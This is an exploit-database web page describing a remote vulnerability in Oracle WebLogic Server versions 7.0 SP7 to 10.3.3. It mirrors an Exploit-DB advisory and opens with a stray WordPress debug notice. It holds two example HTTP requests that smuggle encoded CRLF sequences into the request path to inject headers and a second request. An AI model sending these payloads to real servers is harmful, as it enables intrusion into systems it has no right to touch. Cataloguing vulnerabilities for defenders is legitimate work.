Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Remote Vulnerability in Oracle WebLogic Server - exploit.company
header-logo
Suggest Exploit
vendor:
WebLogic Server
by:
Unknown
7.5
CVSS
HIGH
Remote Code Execution
Unknown
CWE
Product Name: WebLogic Server
Affected Version From: 7.0 SP7
Affected Version To: 10.3.2003
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Remote Vulnerability in Oracle WebLogic Server

This vulnerability in Oracle WebLogic Server can be exploited over the HTTP protocol. The attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges for the exploit to succeed. By sending specially crafted requests, an attacker can execute arbitrary code on the affected server.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41620/info

Oracle WebLogic Server is prone to a remote vulnerability.

The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges.

This vulnerability affects the following supported versions:
7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3 

The following example requests are available:

GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close

GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com

Navigation

Suggest Exploit

Services By CQR